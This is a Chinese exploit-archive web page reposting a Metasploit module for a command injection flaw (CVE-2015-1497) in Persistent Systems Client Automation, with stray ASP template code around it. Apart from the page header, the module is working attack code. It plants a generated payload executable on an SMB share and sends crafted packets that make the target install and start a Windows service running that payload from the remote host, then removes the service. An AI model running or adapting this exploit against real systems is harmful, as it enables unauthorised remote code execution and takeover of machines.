<% dim ModuleName,InfoID,ChannelShortName,CorrelativeArticle,InstallDir,ChannelDir,Keyword,PageTitle,ArticleIntro,Articlecontent Keyword=stripHTML("自动化,命令注入,注入,RCE") PageTitle=stripHTML("Persistent Systems Client Automation Command Injection RCE") ArticleIntro=stripHTML("") Articlecontent=stripHTML("           # Exploit Title: Persistent Systems Client Automation (PSCA, formerly…") ModuleName = stripHTML("exploits") InfoID = stripHTML("182317") ChannelShortName=stripHTML("漏洞") InstallDir=stripHTML("http://www.77169.com/") ChannelDir=stripHTML("exploits") %> Persistent Systems Client Automation Command Injection RCE - 华盟网 - http://www.77169.com
您现在的位置: 华盟网 >> 漏洞 >> Exploit >> 正文

自动化命令注入RCE

2015/3/11 作者:不详 来源: 华盟收集
导读 <% if len(ArticleIntro)<3 then Response.Write Articlecontent 'Response.Write "Articlecontent" else Response.Write ArticleIntro 'Response.Write "ArticleIntro" end if %>

 

 

 

 

 

 

 

 

 

 

 

# Exploit Title: Persistent Systems Client Automation (PSCA, formerly HPCA or Radia) Command Injection Remote Code Execution Vulnerability
# Date: 2014-10-01
# Exploit Author: Ben Turner
# Vendor Homepage: Previosuly HP, now http://www.persistentsys.com/
# Version: 7.9, 8.1, 9.0, 9.1
# Tested on: Windows XP, Windows 7, Server 2003 and Server 2008
# CVE-2015-1497
# CVSS: 10

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking

# Exploit mixins should be called first
include Msf::Exploit::Remote::SMB
include Msf::Exploit::EXE
include Msf::Auxiliary::Report

# Aliases for common classes
SIMPLE = Rex::Proto::SMB::Client
XCEPT  = Rex::Proto::SMB::Exceptions
CONST  = Rex::Proto::SMB::Constants


def initialize
super(
'Name'        => 'Persistent Systems Client Automation (PSCA, formerly HPCA or Radia) Command Injection Remote Code Execution Vulnerability',
'Description' => %Q{
This module exploits PS Client Automation, by sending a remote service install and creating a callback payload.
},
'Author'         => [ 'Ben Turner' ],
'License'        => BSD_LICENSE,
'References'  =>
[
],
'Privileged'     => true,
'DefaultOptions' =>
{
'WfsDelay'     => 10,
'EXITFUNC' => 'process'
},
'Payload'     => { 'BadChars' => '', 'DisableNops' => true },
'Platform'    => ['win'],
'Targets'         =>
[
[ 'PS Client Automation on Windows XP, 7, Server 2003 & 2008', {}]
],
'DefaultTarget'   => 0,
'DisclosureDate' => 'January 10 2014'
)

register_options([
OptString.new('SMBServer', [true, 'The IP address of the SMB server', '192.168.1.1']),
OptString.new('SMBShare', [true, 'The root directory that is shared', 'share']),
Opt::RPORT(3465),
], self.class)

end

def exploit

createservice = "\x00\x24\x4D\x41\x43\x48\x49\x4E\x45\x00\x20\x20\x20\x20\x20\x20\x20\x20\x00"
createservice << "Nvdkit.exe service install test -path \"c:\\windows\\system32\\cmd.exe /c \\\\#{datastore['SMBServer']}\\#{datastore['SMBShare']}\\installservice.exe\""
createservice << "\x22\x00\x00\x00"

                startservice = "\x00\x24\x4D\x41\x43\x48\x49\x4E\x45\x00\x20\x20\x20\x20\x20\x20\x20\x20\x00"
                startservice << "Nvdkit service start test"
                startservice << "\x22\x00\x00\x00"

removeservice = "\x00\x24\x4D\x41\x43\x48\x49\x4E\x45\x00\x20\x20\x20\x20\x20\x20\x20\x20\x00"
removeservice << "Nvdkit service remove test"
removeservice << "\x22\x00\x00\x00"

def filedrop()
begin
origrport = self.datastore['RPORT']
self.datastore['RPORT'] = 445
origrhost = self.datastore['RHOST']
self.datastore['RHOST'] = self.datastore['SMBServer']
connect()
smb_login()
print_status("Generating payload, dropping here: \\\\#{datastore['SMBServer']}\\#{datastore['SMBShare']}\\installservice.exe'...")
self.simple.connect("\\\\#{datastore['SMBServer']}\\#{datastore['SMBShare']}")
exe = generate_payload_exe
fd = smb_open("\\installservice.exe", 'rwct')
fd << exe
fd.close

self.datastore['RPORT'] = origrport
self.datastore['RHOST'] = origrhost

rescue Rex::Proto::SMB::Exceptions::Error => e
print_error("File did not exist, or could not connect to the SMB share: #{e}\n\n")
abort()
end
end

def filetest()
begin
origrport = self.datastore['RPORT']
self.datastore['RPORT'] = 445
origrhost = self.datastore['RHOST']
self.datastore['RHOST'] = self.datastore['SMBServer']
connect()
smb_login()
print_status("Checking the remote share: \\\\#{datastore['SMBServer']}\\#{datastore['SMBShare']}")
self.simple.connect("\\\\#{datastore['SMBServer']}\\#{datastore['SMBShare']}")
file = "\\installservice.exe"
filetest = smb_file_exist?(file)
if filetest
print_good("Found, upload was succesful! \\\\#{datastore['SMBServer']}\\#{datastore['SMBShare']}\\#{file}\n")
else
print_error("\\\\#{datastore['SMBServer']}\\#{file} - The file does not exist, try again!")

end

self.datastore['RPORT'] = origrport
self.datastore['RHOST'] = origrhost

rescue Rex::Proto::SMB::Exceptions::Error => e
print_error("File did not exist, or could not connect to the SMB share: #{e}\n\n")
abort()
end
end

begin
filedrop()
filetest()
connect()
sock.put(createservice)
print_status("Creating the callback payload and installing the remote service")
disconnect
sleep(5)
connect()
sock.put(startservice)
                        print_good("Exploit sent, awaiting response from service. Waiting 15 seconds before removing the service")
disconnect
sleep(30)
connect
sock.put(removeservice)
disconnect

rescue ::Exception => e
print_error("Could not connect to #{datastore['RHOST']}:#{datastore['RPORT']}\n\n")
abort()

end
end
end